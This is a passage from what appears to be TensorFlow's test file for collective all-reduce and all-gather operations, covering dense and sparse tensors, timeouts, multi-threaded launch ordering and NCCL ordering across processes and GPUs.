CollectiveReplicaLauncher._prefer_ordering_token = False
class MultiProcessPoolRunner():
def __init__(self, num_processes):
cluster_spec_dict = multi_worker_test_base.create_cluster_spec(
num_workers=num_processes)
self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict)
# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# usually fn usually captures the test class instance, and test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)
def get_global_mpr(num_processes):
if num_processes == 1:
return global_mpr_1p.runner
elif num_processes == 2:
return global_mpr_2p.runner
else:
raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
num_processes)
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super().setUp()
# Enabling collectives can be done in "setUpClass", but requires using
# different collective_keys in different tests as collectives are reused
# across tests. Always resetting collective ops before each test offers
# better test isolation.
global_mpr_1p.runner.run(enable_collective_ops)
global_mpr_2p.runner.run(enable_collective_ops)
def make_collective(self, num_processes, gpu_per_process):
"""Returns collectives and other info to be used in tests.
Args:
num_processes: an integer indicating the number of processes that
participate in the collective.
gpu_per_process: number of GPUs (0 if no GPUs) used by each process.
Returns:
A tuple of (collective, devices, pid) where collective is a instance
of `CollectiveAllReduce`, devices are a list of local devices (str)
attached to the current process, and pid is the id of this process among
all participant processes.
"""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
devices = [
"/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
]
if gpu_per_process > 0:
devices = [
"/job:worker/replica:0/task:%d/device:GPU:%d" %
(cluster_resolver.task_id, i) for i in range(gpu_per_process)
]
group_size = num_processes * len(devices)
collective = cross_device_ops_lib.CollectiveAllReduce(
devices=devices, group_size=group_size)
return collective, devices, cluster_resolver.task_id
def as_list(self, value):
"""An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.
The reason it exists is to provide a uniformed view of returned value of
"reduce" calls, especially across tf.function boundaries. Returning
`Mirrored` from a tf.function will only evaluate the primary value, which
makes collective ops of non-primary device being pruned, and will eventually
cause hanging.
Args:
value: the value to convert, can be one of `Mirrored`, `Tensor` and
`IndexedSlices`.
Returns:
A list of `Tensor` or `IndexedSlices`.
"""
if isinstance(value, ops.Tensor):
return [value]
elif isinstance(value, IndexedSlices):
return [value]
elif isinstance(value, value_lib.Mirrored):
return value.values
else:
raise ValueError("unwrap: unsupported input type: %s" % type(value))
RunOptions = collections.namedtuple( # pylint: disable=invalid-name
"RunOptions",
[
"mode", # A list of str from ["eager", "func_graph"]
"num_processes",
"gpus_per_process",
"reduce_op",
"communication_options",
"prefer_unique_instance_key",
])
RunOptions.__new__.__defaults__ = (["eager",
"func_graph"], 2, 0, ReduceOp.SUM,
collective_util.Options(), True)
def reduce_and_verify(self, inputs, expect, options):
"""Reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
fed to i-th replica.
expect: a `Tensor` or `IndexedSlices`. This should be the expected value
for one replica.
options: a `RunOpotions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def reduce_fn():
value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
per_replica_value = make_per_replica_value(value_fn, devices)
reduced_values = collective.reduce(options.reduce_op, per_replica_value,
per_replica_value,
options.communication_options)
reduced_values = self.as_list(reduced_values)
self.assertAllEqual(devices, [v.device for v in reduced_values])
return [ops.convert_to_tensor(v) for v in reduced_values]
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if "eager" in options.mode:
got = reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
def batch_reduce_and_verify(self, inputs, expect, options):
"""Batch reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
value will be fed to i-th replica.
expect: a list of `Tensor` or `IndexedSlices`. This should be the expected
value for one replica.
options: a `RunOpotions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def batch_reduce_fn():
batch_size = len(inputs[0])
value_dst_pairs = []
for i in range(batch_size):
def value_fn(device_idx, idx=i):
return inputs[pid * len(devices) + device_idx][idx]
per_replica_value = make_per_replica_value(value_fn, devices)
value_dst_pairs.append((per_replica_value, per_replica_value))
reduced_values = collective.batch_reduce(options.reduce_op,
value_dst_pairs,
options.communication_options)
reduced_values = [self.as_list(v) for v in reduced_values]
for v in reduced_values:
self.assertAllEqual(devices, [t.device for t in v])
return nest.map_structure(ops.convert_to_tensor, reduced_values)
per_replica_expect = nest.map_structure(
lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)
if "eager" in options.mode:
got = batch_reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(batch_reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [1.0, 2.0, 3.0, 4.0]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = 1.0
if group_size == 2:
expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
elif group_size == 4:
expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
elif group_size == 2:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1])
elif group_size == 4:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
indices=[0, 1, 1, 2, 7, 8, 3, 2],
dense_shape=[10, 1])
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(prefer_unique_instance_key=[True, False]))
def testReduceSparseVariableLength(self, prefer_unique_instance_key):
# One device per process, 2 processes, 2 replicas in total.
inputs = [
IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
]
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 0, 1, 2],
dense_shape=[10, 1])
self.reduce_and_verify(
inputs,
expect,
self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=2,
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=prefer_unique_instance_key))
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testBatchReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [1.0, 2.0]
if group_size == 2:
expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
elif group_size == 4:
expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = ([
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
])
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [
IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
]
if group_size == 2:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 3, 4],
dense_shape=[5, 1])
]
elif group_size == 4:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
indices=[0, 1, 1, 2, 3, 4, 8, 9],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
indices=[1, 2, 0, 1, 3, 4, 3, 4],
dense_shape=[5, 2])
]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceDense(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = constant_op.constant(1.0)
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [1.0 * group_size] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [1.0] * len(devices)
self.assertAllClose(got, expect)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (constant_op.constant(1.0), constant_op.constant(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(1.0, 2.0)] * len(devices)
self.assertAllClose(got, expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = IndexedSlices(
values=array_ops.identity([[1.]]),
indices=array_ops.identity([0]),
dense_shape=array_ops.identity([5, 1]))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
IndexedSlices([[3. * group_size]], [2], [5, 1]))
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(IndexedSlices([[1.]], [0], [5, 1]),
IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=0,
implementation=CommunicationImplementation.AUTO,
reduce_op=ReduceOp.SUM))
def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
implementation, reduce_op):
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])), array_ops.identity(1.0),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])), array_ops.identity(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
expect = [
(IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
axis=[0, 1, 2],
func_mode=["eager", "func_graph"],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
func_mode, axis, prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)
def gather_fn():
per_replica_value = make_per_replica_value(value, devices)
gathered_values = collective._gather(
per_replica_value, per_replica_value, axis=axis, options=options)
gathered_values = self.as_list(gathered_values)
# Skip checking devices in eager. In eager the device attribute doesn't
# reflect the actual device of the tensor.
if not context.executing_eagerly():
self.assertAllEqual(devices, [v.device for v in gathered_values])
return [ops.convert_to_tensor(v) for v in gathered_values]
group_size = num_processes * (required_gpus or 1)
expect = array_ops.concat([value] * group_size, axis=axis)
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if func_mode == "eager":
result = gather_fn()
self.assertAllClose(result, per_replica_expect)
if func_mode == "func_graph":
result = def_function.function(gather_fn)()
self.assertAllClose(result, per_replica_expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[CommunicationImplementation.RING]))
def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
implementation):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = make_per_replica_value(constant_op.constant([1.]), devices)
@def_function.function
def reduce_fn():
def cond_body():
reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
options)
return math_ops.add_n(self.as_list(reduced)) / len(devices)
return control_flow_ops.cond(
array_ops.identity(False), cond_body, cond_body)
num_replicas = num_processes * len(devices)
self.assertAllEqual(reduce_fn(), [1. * num_replicas])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.NCCL, CommunicationImplementation.RING
],
prefer_unique_instance_key=[True, False]))
def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes,
required_gpus,
implementation,
prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
# If the kernel launch sequence is as-is the program will deadlock since
# NCCL requires the launch order to be same on each device.
v0 = make_per_replica_value(1.0, devices)
v1 = make_per_replica_value(2.0, devices)
# Add a delay to collective_ops.all_reduce according to the input tensors
# index in `sequence.`
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v0, v0), (v0, v0)], options)
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)],
options)
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.NCCL, CommunicationImplementation.RING
],
prefer_unique_instance_key=[True, False]))
def testInputsAreFunctionArgs(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
@def_function.function
def reduce_fn(v):
# Function inputs don't have device placement.
self.assertEqual(v.values[0].device, "")
self.assertEqual(v.values[1].device, "")
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v),
(v, v)],
options)
self.assertEqual(reduced[0].values[0].device, devices[0])
self.assertEqual(reduced[0].values[1].device, devices[1])
self.assertEqual(reduced[1].values[0].device, devices[0])
self.assertEqual(reduced[1].values[1].device, devices[1])
# Returning Mirrored only evaluates the primary value, which causes
# hanging,
return [reduced[0].values, reduced[1].values]
v = make_per_replica_value(1.0, devices)
reduced = reduce_fn(v)
self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceDense(self, num_processes, implementation, required_gpus,
prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1, implementation=implementation)
@def_function.function
def reduce_dense():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're three workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceDense(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1, implementation=implementation)
@def_function.function
def batch_reduce_dense():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceSparse(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1, implementation=implementation)
@def_function.function
def reduce_sparse():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceSparse(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1, implementation=implementation)
@def_function.function
def batch_reduce_sparse():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(combinations.combine(num_processes=1, required_gpus=2))
def testNcclOrdering(self, num_processes, required_gpus):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(
implementation=CommunicationImplementation.NCCL)
v_dense = make_per_replica_value([1.0, 1.0], devices)
v_sparse = make_per_replica_value([
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
], devices)
@def_function.function
def nested_dense():
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
@def_function.function
def nested_sparse():
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# All collectives, function calls, if clause and while loops should be
# chained by control dependencies, so that the execution order is
# deterministic.
@def_function.function
def f():
# pylint: disable=pointless-statement
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reducing dense value.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
# reducing sparse value.
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reduce dense value in nested tf.function.
nested_dense()
# reduce sparse value in nested tf.function.
nested_sparse()
# reduce dense value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
else:
v_dense
# reduce sparse value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
v_sparse
else:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
# reduce dense value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
i += 1
# reduce sparse value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
i += 1
# reducing dense and sparse value again.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
